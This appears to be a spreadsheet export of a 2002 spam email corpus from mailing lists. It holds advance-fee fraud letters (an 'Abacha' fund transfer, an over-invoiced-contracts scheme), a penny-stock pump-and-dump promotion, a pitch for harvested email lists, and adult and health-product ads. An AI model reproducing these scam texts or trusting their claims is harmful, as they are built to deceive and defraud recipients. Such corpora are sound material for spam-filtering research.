Test The CD, when you're 100% satisfied that the CD is everything and more than it claims to be -  then send $49.95 by check. money order or credit card. Our claim to fame, is that our addresses are deliverable!  The number #1 problem with email lists are  deliverability. You may have seen dozens of ads for lists or CD's or you may have purchased a list in  the past. Chances are, the list was produced 6 months, 1 year or even two years ago! Not ours, a new  volume CD comes out every 6-7 weeks.  Here's how we prepare our e-mail lists: 1. We clean and eliminate all duplicates.  2. Next, we use a filter list of 400+ words/phrases to clean even more. No address with inappropriate or  profane wording survive!  3. Then, a special filter file is used to eliminate the "Web Poisoned" e-mail addresses from the list. Our EXCLUSIVE system reduced these "poison" addresses to near zero. You may have seen CD's with 30, 40,  50 million addresses, not only do they contain many undeliverable addresses, but most are notorious for  millions of these "poisoned" email addresses. 4. Next we used our private database of thousands of known "extremists" and kicked off every one we could  find. NOTE:We maintain the world's largest list of individuals and groups that are opposed to any kind of  commercial e-marketing... they are gone, nuked! 5. All domains have been verified as valid.  WHAT DID WE END UP WITH?       THE POWERMAN 10 MILLION INTERNET MARKETING SHOP CD If you want us to send you the POWERMAN 10 MILLION Internet Marketing Shop CD   email:  POWERMAN10MILLION@hotmail.com Subject Line: SEND CD Your Mailing Address: Getting this CD is equivalent to buying EVERY CD sold by almost everyone else, combined... EXCEPT -  it has been cleaned and the quality is unsurpassed by any list in existence!  With our super clean lists you'll  send less...and get better results... plus you can start mailing as soon as you receive your CD!  * Y O U   G E T  W H A T   Y O U   P A Y   F O R * Our POWERMAN 10 MILLION INTERNET MARKETING CD will result in: * Higher Response Rates * Higher Sales Conversion Ratios * More Receptive prospects; Less Flames &amp; Non-Buyers. * Less Contact With Anti-Commerce Radicals &amp; Extremists. Remember that potential income chart at the beginning of this message? Can you imagine the kind of money you could  make if you mailed one million pieces and sold only one tenth (.01%) of one percent? You do the math, you'll be amazed! This product will prove to be the best of it's kind compared to ANY CD in terms of hours and money spent bringing it to market. No competitor will ever duplicate the effort of what it takes for us to produce this superb product. We never have  compromised on quality, and surely won't release any product before it passes our "high standards" test.This is not a  rental list that is restricted to a one-time mailing. You are purchasing an e-mail address list for your own personal mailings  and may use it over-and-over. If you want us to send you the POWERMAN 10 MILLION Internet Marketing Shop CD   email:  POWERMAN10MILLION@hotmail.com Subject Line: SEND CD Your Mailing Address: _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ ** F R E E    B O N U S E S ** "BUSINESS ON A DISK" bonus offer: Every survey has always indicated that the easiest and most profitable product to sell on the Internet is INFORMATION! If you have an "information" type product, then there is no easier way to become financially independent.  Our "BUSINESS ON A DISK" gives you awesome resalable products reports/manuals/books that that are yours  to use. You may instantly start your "Information Product" business! Just think, you can reproduce a complete book  on a floppy disc in just a few seconds, for around 35 cents. These are the same books that have  sold for $99. "Special Reports" cost you pennies to produce and can be  sold for as high as $15... or the whole group  for as high as $140.00. "THE MASS E-MAIL SURVIVAL GUIDE" A manual/guide that addresses the Mass E-Mail business. Especially useful  for beginners. "THE Mass E-MAIL SURVIVAL GUIDE" will answer most of your questions and concerns about Mass E-Mail.  An exclusive for our customers... INCLUDED FREE. If you want us to send you the POWERMAN 10 MILLION Internet Marketing Shop CD   email:  POWERMAN10MILLION@hotmail.com Subject Line: SEND CD Your Mailing Address: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408</t>
  </si>
  <si>
    <t>To: "HB7-23" &lt;boggs92672@cox.net&gt;\nFrom: "ABoggs" &lt;boggs92672@cox.net&gt;\nDate: Tue, 23 Jul 2002 14:18:09 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 14:18:09 -0700</t>
  </si>
  <si>
    <t>"ABoggs" &lt;boggs92672@cox.net&gt;</t>
  </si>
  <si>
    <t>"HB7-23" &lt;boggs92672@cox.net&gt;</t>
  </si>
  <si>
    <t>Earn Extra Income**</t>
  </si>
  <si>
    <t>Want to make a million bucks this year?\nMe too but it's probably not going happen!\n \nHowever if you're looking for the opportunity to\nmake a couple thousand a week,\nworking from home with your pc, we need to talk.\n \nIf you're over 18 and a US resident,\n \nJust Click REPLY\n \nSend me your Name, State,\nComplete telephone number,\nand the best time to contact you.\n \nI will personally speak with you within 48 hours.\n	    \n Have a great day!  \n\nRemoval instructions:\n*************************\nTo be removed from this list please reply with "remove" in the subject line.\nPlease allow a few days for removal to take effect. Thanks!!\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91</t>
  </si>
  <si>
    <t>To: cpunks@minder.net\nFrom: "mabacha5@lycos.com" &lt;a_gidado@go.com&gt;\nDate: Tue, 23 Jul 2002 14:05:04</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 14:05:04</t>
  </si>
  <si>
    <t>"mabacha5@lycos.com" &lt;a_gidado@go.com&gt;</t>
  </si>
  <si>
    <t>Assistance requested(Please Read).</t>
  </si>
  <si>
    <t>Dear Sir/Ma, \nI am HAJIYA MARYAM ABACHA, wife of the late Nigeria Head of State,General Sanni Abacha who died on the 8th of June, 1998 while still on active duty. l am contacting you in view of the fact that we will be of great assistance to each other likeness developing a cordial relationship. I currently have within my reach the sum of THIRTY FIVE MILLION US Dollars (US$35,000,000.00) cash which l intend to use for investment, like Real Estate Development or import/export business specifically in your country. This money came as a payback contract deal between my late husband and a Russian Firm on our countries multi-billion dollars Ajaokuta Steel Plant Project. The Russian Partners returned my husband's share of USD$35,000,000.00 after the death of my husband and lodged in my husband's security company of which l am director right now, the new Civilian Government have intensified their probe on my husband's financial and oil company. In view of these, l acted fast to withdraw the US$3!\n 5,000,000.00 from the company's vault and deposited in another private security company vault within the country. I have since declared the Security Company bankrupt. No record ever existed concerning the money traceable by the government because there is no documentation showing that we received the money from the Russian. Due to the current situation in the country concerning government attitude towards my family, it has become quite impossible for me to make use of this money within. Let me refer you to the front page of This Day Newspapers of 10th March 2001. You can check it through their website : [URL]www.thisdayonline.com[/URL] , click on archives,8th. june, 2001) The present government in Nigeria had frozen and seized all my bank accounts both here in Nigeria and abroad. Thus consent l shall expect you to contact me urgently to enable us discuss in detail about this transaction. Bearing in mind that your assistance is needed to transfer this fund, l proposed a percentage of 3!\n 0% of the total sum to you for the expected service and assistance, 10\n% for offsetting minor expenses incurred in the course of this transaction. Your urgent response is highly needed as to stop further contacts. All correspondence must be by the email address above. l must use this opportunity to implore you to exercise the utmost indulgence to keep this matter extraordinarily confidential whatever your decision while await your prompt response. NB: Because of the security being mounted on the members of my family, l have decided that this transaction be kept in utmost secrecy, remember to include your private Telephone or fax number for easy communication. You can also contact my trusted friend and family attorney,Barrister Aishat Gidado at aishatgidado@go.com or her number 248033044180.\nBest Regards. \nHajia Maryam Abacha.\n\n\n\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www.thisdayonline.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5388</t>
  </si>
  <si>
    <t>To: &lt;cypherpunks@einstein.ssz.com&gt;\nFrom: "Dr. Kataga Bakori" &lt;kataga@africamail.com&gt;\nDate: Tue, 23 Jul 2002 13:16:23</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 13:16:23</t>
  </si>
  <si>
    <t>"Dr. Kataga Bakori" &lt;kataga@africamail.com&gt;</t>
  </si>
  <si>
    <t>&lt;cypherpunks@einstein.ssz.com&gt;</t>
  </si>
  <si>
    <t>Awiating your fax response.</t>
  </si>
  <si>
    <t>(Fax) to  my direct confidential  Fax No: 234 1 7591666  \n\nDr. Kataga Bakori\nLagos, Nigeria.\n23rd July 2002\n\n\nAttention President/C.E.O\n                   \nDear Sir,\n\nREQUEST FOR URGENT BUSINESS RELATIONSHIP.\n\nFirstly I must solicit your strictest confidence in this subject. This is by virtue of its nature as \nbeing utterly confidential and top secret. A member of the Nigeria Export Promotion Council \n(N.E.P.C.) who was part of the federal government delegation to your country during a trade \nexhibition gave your particulars to me. I have decided to seek a confidential operation with \nyou in the execution of the deal described hereunder for the benefit of all the parties and \nhope that you keep it top secret because of the nature of the business.\n\nWithin the ministry of petroleum resources where I work as a director of engineering and \nprojects, and with the co-operation of four other very top officials, we have under our \ncontrol as overdue contract payments, bills totaling Thirty One Million United States Dollars, \nwhich we want to transfer to a foreign account, with the assistance and co-operation of a \nforeign company to receive the said funds on our behalf or a reliable foreign individual \naccount to receive the funds.\n\nThe source of the fund is as follows: during the last military government here in Nigeria \nwhich lasted bout eleven months, government officials set up companies and awarded \nthemselves various contracts which were grossly over-invoiced in various ministries.  The \npresent civilian government is not aware of the atrocities committed by their predecessors \nand as a result, we have a lot of such over invoiced contract payment s pending which we \nhave identified floating at the central bank of Nigeria ready for payment.  However by virtue \nof our position as civil servants, we cannot acquire this money in our names.  I was \ntherefore delegated as a matter of urgency by my colleagues to look for an over seas \npartner into whose account we would transfer the sum of  US$31,000,000.00 (THIRTY \nONE MILLION UNITED STATES DOLLARS) hence we are writing you this letter.\n\n the present civilian government is determined to pay foreign contractors l debts owed \nso as to maintain an amiable relationship with foreign governments and non-government \nfinancial agencies.  We have decided to include our bills for approval with the co-operation \nof some officials of the federal ministry of finance (F.M.F) and the central bank of Nigeria \n(C.B.N).  We are seeking your assistance in providing us with a good company account or \nany other offshore bank account into which we can remit this money by acting our main \npartner and trustee or acting as the original contractor.  This we can do by swapping of \naccount information and changing of beneficiary and other pertinent information to apply for \npayment.  By this act, we would be using your company information to apply for payment, \nand prepare letters of claim and job description on behalf of your company.  This process \nwould be an internal arrangement with the departments concerned.\n\nI have the authority of my partners involved to propose that should you be willing to assist \nus in this transaction, your share as compensation will be us$6.2 million (20%), us$21.7 \nmillion (70%) for us and us$3.1 (10%) for \ntaxation and miscellaneous expenses.\n\nThe business itself is 100% safe, provided you treat it with utmost secrecy and \nconfidentiality.  Also your area of specialization is not m hindrance to the successful \nexecution of this transaction.  I have reposed my confidence in you and hope that you will \nnot disappoint me. \n\nI will bring the complete picture of the transaction to your \nknowledge when I have heard from you.\n\nThanks for your co-operation,\n\nYours faithfully,\n\nDr. Kataga Bakori\n\nNB: Please respond by sending a facsimile (Fax) to  my direct confidential  Fax No: 234 1 \n7591666  \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78</t>
  </si>
  <si>
    <t>To: AOL.Users@locust.minder.net\nFrom: &lt;latest7805q42@yahoo.com&gt;\nDate: Tue, 23 Jul 2002 12:07:33 +0200</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 12:07:33 +0200</t>
  </si>
  <si>
    <t>&lt;latest7805q42@yahoo.com&gt;</t>
  </si>
  <si>
    <t>AOL.Users@locust.minder.net</t>
  </si>
  <si>
    <t>State of the art long distance                                                    7325ZMhY2-201HEQY5778-20</t>
  </si>
  <si>
    <t>Hi:  Have    you been paying too much for your home or   business long distance? Have    you been looking for an affordable but honest   long distance alternative? We are offering    Fiber optic Long distance for   as low as $9.95 per month! Email    us with your phone number and we'll call you   back so you can hear how great the connection is.   Six plans to choose from including a travel plan.  There are no credit checks and because you don't    need to change your long distance carrier, your    service can be turned on in just a few hours.    Distributors needed!  We have distributors now making a few hundred to    many thousands of dollars per month from the comfort    of their homes.    Obtain complete    details Include your phone number- we'll   call you back to confirm our crisp clear connection.   To be removed: click here 2032UFYD2-959lOlR2290WEYy6-444nUHE5892loyf3-037iQUI9771WgxC8-113WmiB1248QRl70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94</t>
  </si>
  <si>
    <t>To: paul@hotmail.com\nFrom: jim@hotmail.com\nDate: Tue, 23 Jul 2002 10:34:00 -0500</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 10:34:00 -0500</t>
  </si>
  <si>
    <t>jim@hotmail.com</t>
  </si>
  <si>
    <t>paul@hotmail.com</t>
  </si>
  <si>
    <t>EARN MONEY AT HOME</t>
  </si>
  <si>
    <t>Do you want to make money from home?  Are you tired\nof working for someone else? Then welcome to the \nfuture.  \n\n[URL]http://www.lotsonet.com[/URL]\n\n\nDue to our overwhelming growth of nearly 1,000% \nover the last three years, we have an immediate \nneed and are willing to train and develop even \nnon-experienced individuals in local markets.\n\n[URL]http://www.lotsonet.com[/URL]\n\nWe are a 14 year old Inc 500 company.  Are you \nwilling to grow?  Are you ready to take on the\nchallenges of the future?  Than we want you!\n\nSimply click on the link below for free information!\nNo obligation whatsoever.\n\n[URL]http://www.lotsonet.com[/URL]\n\n \n\nTo be removed from this list go to:\n\n[URL]www.lotsonet.com[/URL]\n\n\n8232uIAl6-753PUkF1189GdAA5-028quJX3243TdaE2-074Tyus9203nLbO9-417tEAl63\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www.lotsonet.com http://www.lotsonet.com http://www.lotsonet.com www.lotsonet.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5362</t>
  </si>
  <si>
    <t>To: &lt;cypherpunks@einstein.ssz.com&gt;\nFrom: "Manager" &lt;Emaildata@china1mail.com&gt;\nDate: Tue, 23 Jul 2002 09:19:16 +0800</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 09:19:16 +0800</t>
  </si>
  <si>
    <t>"Manager" &lt;Emaildata@china1mail.com&gt;</t>
  </si>
  <si>
    <t>Promote Your Business</t>
  </si>
  <si>
    <t>\n\n_The power of Email Marketing_\n\n  \n\nEmail Marketing is spreading around the whole world because of its high\neffectiveness,  \nspeed and low cost.\n\n  \nNow if you want to introduce and sell your product or service, look for a\npartner to raise  \nyour website's reputation. The best way would be for you to use email to\ncontact your  \ntargeted customer (of course,first, you have to know their email addresses).  \n  \n\nTargeted Email is no doubt very  effective.  If you can introduce your product\nor service  \nthrough email directly to the customers who are interested in them,   this\nwill  bring your  \nbusiness a better chance of success.\n\nXin.Lan  Internet  Marketing  Center,  has  many years of experience in\ndeveloping and  \nutilizing internet resources.We have set up global  business  email-address\ndatabases  \nwhich contain  millions of email addresses of commercial  enterprises  and\nconsumers  \nall over the world. These emails are sorted by countries  and  fields. We also\ncontinuo-  \nusly  update  our  databases,   add  new  addresses  and   remove\nundeliverable  and  \nunsubscribed addresses.\n\nWith the co-operation with our partners,  we can supply valid targeted email\naddresses  \naccording  to  your  requirements,  by  which  you can  easily  and  directly\ncontact your  \npotential customers.With our help many enterprises and individuals have\ngreatly raised  \nthe fame of their products or service and found many potential customers.  \n  \nWe also supply a  wide variety of software.  For example, Wcast,  the software\nfor fast-  \nsending emails:this software is a powerful  Internet  email-marketing\napplication  which  \nis perfect for individuals or businesses to send multiple customized email\nmessages to  \ntheir customers.  \n  \nWe are pleased to offer you our best prices :\n\n| **           Emails  or  Software** | **\nRemarks** | **     Price**  \n---|---|---  \n30,000 targeted email addresses  |  \nWe are able to supply valid targeted email addresses according to your\nrequirements,  which are compiled  \nonly on your order, such as region / country / field / occupation / Domain\nName (such as AOL.com or  \nMSN.com) etc.  \n|   USD 30.00  \n     Classified email addresses |   \nOur database contains more than 1600 sorts of email addresses,and can meet\nyour most stringent demands.  \n  \n|  \n    8 million email addresses |   \n8 million email addresses of global commercial enterprise  \n  \n|  USD 240.00  \n        Wcast software  |   \nSoftware for fast-sending emails. This program can  \nsend mail at a rate of over 10,000 emails per hour,  \nand release information to thousands of people in a  \nshort time.  \n  \n|   USD 39.00  \n       Email searcher software  | Software for searching for targeted email addresses.  \n|   USD 98.00  \n**         **Global Trade Poster |  \nSpread information about your business and your products to over 1500 trade\nmessage boards and newsgroups.  \n  \n|  USD 135.00  \n       Jet-Hits Plus 2000 Pro  |   \nSoftware for submitting website to 8000+  search engines.  \n  \n|   USD 79.00  \n  \n  \nYou may order the email lists or software directly from our website. For\nfurther details,  \nplease refer to our website.  \n  \nWe will be  honoured  if you are interested  in our services or software.\nPlease do not  \nhesitate to contact us with any queries or concern you may have.  We will be\nhappy to  \nserve you.  \n  \n  \nBest regards!  \n  \n              Kang Peng  \nMarketing Manager  \nHttp://[URL]www.como-verder.com[/URL]  \nSales@marketing-promote.com  \nXin.Lan Internet Marketing Center\n\n* * *\n\nYou are receiving this email because you registered to receive special offers\nfrom one of our marketing  \npartners.If you would prefer not to receive future emails,  please click here\nto  unsubscribe , or send a  \nblank e-mail to  Emaildata@88998.com\n\n* * *  \n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www.como-verder.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5361</t>
  </si>
  <si>
    <t>To: undisclosed-recipients:;\nFrom: 060204@040206.com\nDate: Tue, 23 Jul 2002 09:16:57 +0800</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 09:16:57 +0800</t>
  </si>
  <si>
    <t>060204@040206.com</t>
  </si>
  <si>
    <t>ABj_x0004_c_x0003_»_x0004_8_x0005_ã_x0007_c¸</t>
  </si>
  <si>
    <t>--#MYBOUNDARY#\nContent-Type: text/html; charset=GB2312\nContent-Transfer-Encoding: base64\nX-MIME-Autoconverted: from 8bit to base64 by hq.pro-ns.net id g6N439hX076203\n\nttTSu7j20aqwqbKhyMu6zbzSyvTF89PRtvjR1KOsyrG85NK7t9bSu8Prtdi5/cilo6zUvcHu\nyMu6psXCoaMgDQrO0sPHvLHQ6NKq0rvOu9Gq0M1BQtDNtcS5x8vovujU+dXfy+TIu9a709Cw\n2c3yt9bWrtK7tcS7+rvho6zS8s6qxPq1xLTIsa/T67TzsK6jrMv9ssXT0LvuIA0Kz8LIpbXE\nz6PN+6GjIA0Kx+vJ7LP2xPq1xNSuytbT687Sw8fBqsLn0rLH68T6v8nS1L2r1eK34tDF1NnX\nqrzEuPjE+rXEx9fF87rD09HDxyzQu9C7oaMgDQoNCrjQvKSyu76ho6EgRXJpYyBIdWkgVGVs\nOiAoODUyKS0yNDI2LTYwNzMgKE9mZmljZSk7ICg4NTIpLTkxODEtMjA4MyAoTW9iaWxlKSAN\nCg0K08PX1Ly6tcTSu7fd0NC2r6Oszey+yNbQu6rD8dfltcTV+7j21+W356OsyMPX1Mu9oaLM\nsMC3oaLDu9PQDQrIy9DUtci28c+wtNPW0Ln6yMvJ7cnPz/vKp6GjDQoNCsHtu8a6o7ar0r3K\npr60uOa087zSo6zI57n709BBQtGq0M3V36Osv8nAtNDFwLS156OsyLu689TZwarPtcnPuqO5\nx8vov+LF5NDNo6hITEG31tDNo6mhoyANCsjnufu087zS09DJz7qj1tDQxNGq1b678snPuqPW\n0LuqucfL6L/itcTN+Na3u/K157uwv8nS1L6hv+zBqs+1oaPB7c3io6y4+b7d1K3Qxbz+tcS1\n57uwusUgDQrC66Osu7zV37/JxNzOqs/juNvIy6Osy/nS1MjnufvT0LnjtqvF89PRo6zH676h\nwb/Xqrjmo6zV4tH5v8nS1NT2vNPF5NDNtcSzybmmwsqho9C70LuhoyANCg0KDQo=\n--#MYBOUNDARY#--\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98</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: news@bluecom.com\nDate: Tue, 23 Jul 2002 09:15:27 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 09:15:27 -0700 (PDT)</t>
  </si>
  <si>
    <t>news@bluecom.com</t>
  </si>
  <si>
    <t>We are on the look-out for new partners such as you and your company</t>
  </si>
  <si>
    <t>-----=b1z9tz8hennlu9udi_dkzpz49njtph Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit We are on the look-out for new partners such as you and your company Whether you want to buy or sell, BlueCom Danmark A/S is worth closer acquaintance BlueCom Danmark A/S is a worldwide IT-distributor of PC-systems and add-ons. Since its foundation in 1992 the company has enjoyed constant growth, and is always on the look out for new partners to cooperate with.  We have found you and your company through our Internet research, and hope to establish a fruitful cooperation with you in the future. However, we apologies if you are not the correct person to contact within your company, and kindly request that you forward this message to that person. Further, if this letter is of no interest to you and your company, please press the unsubscribe button in this mail. The easiest way to start cooperating with BlueCom Danmark A/S is through our user-friendly website.  If any of the features detailed below are of interest to your company, please click on the link and our cooperation has already begun.  CUSTOMER: Would you like the best prices on the market, plus 24-hour delivery and an incredible 30 days credit? Then maybe you would like to become our partner or customer.  We are able to offer the absolute best prices on the market because of our large-scale procurement of a small number of specific products. Our range includes products from IBM, Compaq and HP Options such as Notebooks, PCs and Monitors. We also offer PC parts such as RAM, CPUs, VGA cards, Motherboards, Wireless products, original Mobile Phones and accessories, Hard disks, DVD, CD-RW, TFT screens, from the following top companies: ASUS, ECS, ABIT, CREATIVE, INTEL, AMD, U.S. ROBOTICS, LG, PLEXTOR, BELKIN, BENQ, SAMSUNG, IBM SOFTWARE and many more.  Besides delivering at the very best prices, we offer Real-Time updated prices through our Customer Lounge, 24-hour delivery all over Europe and 30 days credit. Please click here: [URL]http://ocms.ocms.dk[/URL] SUPPLIER: Are you a future supplier to BlueCom Danmark A/S? BlueCom Danmark A/S keeps it suppliers updated on products in demand, the specific volumes on request, and of course the target prices. If you would like to see which products and target prices we are interested in right now, please click here: [URL]http://ocms.ocms.dk[/URL]   EVERYBODY: Would you like to receive IT News? BlueCom Danmark A/S offers IT News for free.  We produce a newsletter with articles covering the changes in our industry, new products, tariff rates and general trends in the IT-market. The newsletter also contains information about BlueCom Danmark A/S and the development of its business partners.  Please click here: [URL]http://ocms.ocms.dk[/URL] Would you like more information about BlueCom Danmark A/S?  For further information please do not hesitate to contact BlueCom Danmark A/S. You can also visit our homepage at: [URL]http://ocms.ocms.dk[/URL] Thanks for your time. We look forward to hearing from you. Best regards Jens Fournais, Managing Director BlueCom Danmark A/S To unsubscribe from this mailing list, please click here: [URL]http://ocms.ocms.dk[/URL] -----=b1z9tz8hennlu9udi_dkzpz49njtph Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Partner Mail We are on the look-out    for new partners such as you and your company   Whether you want to buy or sell, BlueCom Danmark A/S is worth closer acquaintance   BlueCom Danmark A/S is a worldwide IT-distributor of PC-systems and add-ons.    Since it's foundation in 1992 the company has enjoyed constant growth, and is    always on the look out for new partners to cooperate with.    We have found you and your company through our Internet research, and hope to    establish a fruitful cooperation with you in the future. However, we apologies    if you are not the correct person to contact within your company, and kindly    request that you forward this message to that person. Further, if this letter    is of no interest to you and your company, please press the "unsubscribe" button    in this mail.    The easiest way to start cooperating with BlueCom Danmark A/S is through our    user-friendly website. If any of the features detailed below are of interest    to your company, please click on the link and our cooperation has already begun. CUSTOMER:  Would you like the best prices on the market, plus 24-hour delivery and an    incredible 30 days credit?    Then maybe you would like to become our partner or customer.   We are able to offer the absolute best prices on the market because of our large-scale    procurement of a small number of specific products. Our range includes products    from IBM, Compaq and HP Options such as Notebooks, PCs and Monitors. We also    offer PC parts such as RAM, CPUs, VGA cards, Motherboards, Wireless products,    original Mobile Phones and accessories, Hard disks, DVD, CD-RW, TFT screens,    from the following top companies: ASUS, ECS, ABIT, CREATIVE, INTEL, AMD, U.S.    ROBOTICS, LG, PLEXTOR, BELKIN, BENQ, SAMSUNG, IBM SOFTWARE and many more.    Besides delivering at the very best prices, we offer Real-Time updated prices    through our Customer Lounge, 24-hour delivery all over Europe and 30 days credit.       Please click here: Customers    Lounge  SUPPLIER:  Are you a future supplier to BlueCom Danmark A/S?    BlueCom Danmark A/S keeps it suppliers updated on products in demand, the specific    volumes on request, and of course the target prices. If you would like to see    which products and target prices we are interested in right now,    please click here: Suppliers    Lounge    EVERYBODY:  Would you like to receive IT News?  BlueCom Danmark A/S offers IT News for free. We produce a newsletter with    articles covering the changes in our industry, new products, tariff rates and    general trends in the IT-market. The newsletter also contains information about    BlueCom Danmark A/S and the development of its business partners.    Please click here: IT-News Would you like more information about BlueCom Danmark A/S?    For further information please do not hesitate to contact BlueCom Danmark A/S.       You can also visit our homepage at: [URL]www.bluecom.com[/URL]   Thanks for your time. We look forward to hearing from you.    Best regards    Jens Fournais   Managing Director    BlueCom Danmark A/S    To unsubscribe from this mailing    list, please click here: UNSUBSCRIBE   (You are subscribed with this e-mail address: fork@spamassassin.taint.org ) -----=b1z9tz8hennlu9udi_dkzpz49njtph-- [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://ocms.ocms.dk http://ocms.ocms.dk http://ocms.ocms.dk http://ocms.ocms.dk http://ocms.ocms.dk www.bluecom.com http://xent.com</t>
  </si>
  <si>
    <t>5384</t>
  </si>
  <si>
    <t>To: cypherpunks@einstein.ssz.com\nFrom: Kate &lt;kate.23@hotsexshows.com&gt;\nDate: Tue, 23 Jul 2002 08:21:33 -0400</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 08:21:33 -0400</t>
  </si>
  <si>
    <t>Kate &lt;kate.23@hotsexshows.com&gt;</t>
  </si>
  <si>
    <t>live SEX SHOWS</t>
  </si>
  <si>
    <t>**LIVE SEX SHOWS  \n  \n**![]([URL]http://www.pornstarsxtra.com[/URL]\n\n **WET, HOT, HORNY GIRLS WAITING FOR YOU! THE HOTTEST LIVE SEX SHOWS!CLICK\nHERE TO ENTER NOW !  \nCLICK HERE TO SEE THE SHOWS !**\n\n![]([URL]http://www.pornstarsxtra.com[/URL]\n\nto unsubscribe from this mailing list please reply to this email with the word\n"remove" in the subject line.  \--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www.pornstarsxtra.com http://www.pornstarsxtra.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5372</t>
  </si>
  <si>
    <t>To: "Friend" &lt;cypherpunks@einstein.ssz.com&gt;\nFrom: "Only the Best" &lt;OnlyTheBest_______r-7552100-336@mm53.com&gt;\nDate: Tue, 23 Jul 2002 06:48:05 UT</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 06:48:05 UT</t>
  </si>
  <si>
    <t>"Only the Best" &lt;OnlyTheBest_______r-7552100-336@mm53.com&gt;</t>
  </si>
  <si>
    <t>Friend,  Meet over 1 million singles at Date.com</t>
  </si>
  <si>
    <t>MEET OTHER SINGLES              JUST LIKE YOU     Tired of searching              for love in all the wrong places?Find love now, the easy              way.     JOIN FOR              FREEFind your soul mate today!BROWSE THROUGH              THOUSANDS OF PERSONALS IN YOUR OWN AREA. CLICK                          HEREto Find Love Now!   Remove yourself from this recurring list by: Clicking here to send a blank email to unsub-7552100-336@mm53.com OR Sending a postal mail to CustomerService, 427-3 Amherst Street, Suite 319, Nashua, NH 03063 This message was sent to address cypherpunks@einstein.ssz.com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76</t>
  </si>
  <si>
    <t>To: cpunks@einstein.ssz.com\nFrom: seni@istiyorum.com\nDate: Tue, 23 Jul 2002 04:26:35 -0400</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 04:26:35 -0400</t>
  </si>
  <si>
    <t>seni@istiyorum.com</t>
  </si>
  <si>
    <t>Internet ve Para</t>
  </si>
  <si>
    <t>CashIC.com =DDnternetten para kazandiran, en onemlisi Turkiye ye de odeme=\n yapan bir sponsor. Uye olmak icin internetsitenizin olmas=FD da gerekmiy=\nor, herkes uye olup para kazanabilir.\nUye olduktan sonra 6 degisik sek=FDlde para kazanmaya basliyor ve her ay =\nbasinda ne kadar kazandiysaniz odemezi 10 gun =FDc=FDnde cek olarak aliyo=\nrsunuz! Internetten para kazanmak istiyenler icin kacirilmamasi gereken b=\nir firsat!!!\nAttaki linke t=FDkladiktan sonra acilan sayfadan "Join Now" yazan yere ti=\nklayip acilan formu doldurun &amp; Kazanmaya baslayin !!!!\nClick here:  [URL]http://www.clickXchange.com[/URL]\n\n\n\n\n\n-\n\n--------------------------------------------------------------------\n\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www.clickXchange.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5375</t>
  </si>
  <si>
    <t>To: Undisclosed.Recipents@locust.minder.net\nFrom: Jane Lowery &lt;egjanelowery@hotmail.com&gt;\nDate: Tue, 23 Jul 2002 04:23:17 -0400</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 04:23:17 -0400</t>
  </si>
  <si>
    <t>Jane Lowery &lt;egjanelowery@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Undisclosed.Recipents@locust.minder.net</t>
  </si>
  <si>
    <t>Bigger, Fuller Breasts Naturally In Just Weeks.......                         mwnk</t>
  </si>
  <si>
    <t>**For women ages 13 to 60 plus....**  \n  \nAs seen on TV....  \nSafely Make Your Breasts  \nBigger and Fuller  \nIn the privacy of your own home.  \n  \n**Guaranteed quick results** Click Here For Full Report  \n  \n  \n  \n  \n  \n  \n  \n  \n  \n  \n  \n  \n  \n  \n  \nugwwlrlujryqgveswijfmhb \--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363</t>
  </si>
  <si>
    <t>To: "Inbox" &lt;6900@wcom.com&gt;\nFrom: "Jacqueline Coy" &lt;robertp262riw@dspis.co.il&gt;\nDate: Tue, 23 Jul 2002 02:49:41 +0100</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 02:49:41 +0100</t>
  </si>
  <si>
    <t>"Jacqueline Coy" &lt;robertp262riw@dspis.co.il&gt;</t>
  </si>
  <si>
    <t>"Inbox" &lt;6900@wcom.com&gt;</t>
  </si>
  <si>
    <t>Re:</t>
  </si>
  <si>
    <t>=                                                                               Fo= r                                         Immediate Release Cal-Bay (Stock Symbol: CBYI)        Watch for analyst =22Strong Buy Recommendations=22 and sev= eral advisory newsletters        picking CBYI.   CBYI has filed to be traded on the = ;OTCBB,        share prices historically INCREASE when companies get listed        on this larger trading exhange. CBYI is trading around 25 ce= nts        and should skyrocket to =242.66 - =243.25 a share in the near futur= e.          Put CBYI on your watch list, acquire a postion TODAY.               =                                                      REASONS TO INVEST IN CBYI                                     A profitable company and is on = track to beat ALL        earnings estimates                                                                     =21 One of the FASTEST growing distrib= utors in environmental &amp; safety        equipment instruments.                                                             =                                       Excellent management team= , several EXCLUSIVE        contracts.  IMPRESSIVE client list including the U.S. A= ir Force,        Anheuser-Busch, Chevron Refining and Mitsubishi Heavy Industries,=         GE-Energy &amp; Environmental Research. RAPID= LY GROWING INDUSTRY Industry revenues exceed =24900 mil= lion, estimates indicate that there        could be as much as =2425 billion from =22smell technology=22 by the=  end of        2003. =21=21=21= =21=21 CONGRATULATIONS        =21=21=21=21=21Our last recommendation to buy ORBT a= t        =241.29 rallied and is holding steady at =244.51=21&amp;n= bsp;        Congratulations to all our subscribers that took advantage of thi= s        recommendation.      =                                                              ALL removes HONER= ED. Please allow 7        days to be removed and send ALL address to: NeverAgain=40btamail.net.cn     Certain statements contained in this news release m= ay be  